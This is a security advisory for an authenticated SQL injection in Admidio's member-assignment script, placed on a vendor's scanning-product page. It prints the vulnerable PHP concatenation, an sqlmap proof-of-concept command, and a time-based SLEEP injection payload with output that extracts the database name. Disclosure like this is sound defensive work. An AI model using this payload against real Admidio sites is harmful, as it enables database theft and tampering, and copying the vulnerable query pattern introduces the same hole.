GHSA-2v5m-cq9w-fc33
HIGHAdmidio Vulnerable to Authenticated SQL Injection in Member Assignment Functionality
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
admidio/admidioReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
An authenticated SQL injection vulnerability exists in the member assignment data retrieval functionality of Admidio. Any authenticated user with permissions to assign members to a role (such as an administrator) can exploit this vulnerability to execute arbitrary SQL commands. This can lead to a full compromise of the application's database, including reading, modifying, or deleting all data. The vulnerability is present in the latest version, 4.3.16.
Details
The vulnerability is located in the adm_program/modules/groups-roles/members_assignment_data.php script. This script handles an AJAX request to fetch a list of users for role assignment. The filter_rol_uuid GET parameter is not properly sanitized before being used in a raw SQL query.
File: adm_program/modules/groups-roles/members_assignment_data.php
// ...
// The parameter is retrieved from the GET request without sufficient sanitization for SQL context.
$getFilterRoleUuid = admFuncVariableIsValid($_GET, 'filter_rol_uuid', 'string');
$getMembersShowAll = admFuncVariableIsValid($_GET, 'mem_show_all', 'bool', array('defaultValue' => false));
// ...
$filterRoleCondition = '';
if ($getMembersShowAll) {
$getFilterRoleUuid = 0;
} else {
// show only members of current organization
if ($getFilterRoleUuid !== '') {
// VULNERABLE CODE: $getFilterRoleUuid is directly concatenated into the query string.
$filterRoleCondition = ' AND rol_uuid = \''.$getFilterRoleUuid . '\'';
}
}
// ...
// The vulnerable $filterRoleCondition is then used inside a subselect.
$sqlSubSelect = '(SELECT COUNT(*) AS count_this
FROM '.TBL_MEMBERS.'
INNER JOIN '.TBL_ROLES.'
ON rol_id = mem_rol_id
INNER JOIN '.TBL_CATEGORIES.'
ON cat_id = rol_cat_id
WHERE mem_usr_id = usr_id
AND mem_begin <= \''.DATE_NOW.'\'
AND mem_end > \''.DATE_NOW.'\'
'.$filterRoleCondition.'
AND rol_valid = true
AND cat_name_intern <> \'EVENTS\'
AND cat_org_id = '.$gCurrentOrgId.')';
// ...
As shown above, the value of $getFilterRoleUuid is directly concatenated into the $filterRoleCondition variable, which is then embedded within a larger SQL query ($sqlSubSelect). This allows an attacker to break out of the string literal and inject arbitrary SQL commands.
PoC (Proof of Concept)
Prerequisites:
- A running instance of Admidio (tested on version 4.3.16).
- An authenticated user session with permissions to assign members to a role (e.g., the default 'admin' user).
Execution:
The vulnerability can be triggered by manipulating the filter_rol_uuid parameter in the request to /adm_program/modules/groups-roles/members_assignment_data.php. Due to the large number of parameters, the easiest way to reproduce this is by capturing a legitimate request and replaying it with sqlmap.
- Log in to Admidio as an administrator.
- Navigate to
Groups / Roles. - Click the "Assign members" icon for any existing role.
- Using a web proxy like Burp Suite, intercept the GET request made to
/adm_program/modules/groups-roles/members_assignment_data.php. - Save the entire raw request to a text file (e.g.,
admidio_request.txt). - Run the following
sqlmapcommand to confirm the time-based blind SQL injection:
sqlmap -r /path/to/admidio_request.txt -p filter_rol_uuid --technique=T --dbms=mysql --current-db
Result:
sqlmap will successfully identify and exploit the time-based blind SQL injection vulnerability.
---
Parameter: filter_rol_uuid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: role_uuid=...&filter_rol_uuid=' AND (SELECT 3332 FROM (SELECT(SLEEP(5)))vqnl) AND 'ENdG'='ENdG&...
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
[INFO] retrieved: admidio
current database: 'admidio'
This confirms that an attacker can execute arbitrary SQL queries and extract information from the database.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | admidio/admidio | all versions | 4.3.17 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for admidio/admidio. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update admidio/admidio to 4.3.17 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-2v5m-cq9w-fc33 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-2v5m-cq9w-fc33 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-2v5m-cq9w-fc33. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-2v5m-cq9w-fc33 in your dependencies?
O3 detects GHSA-2v5m-cq9w-fc33 across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.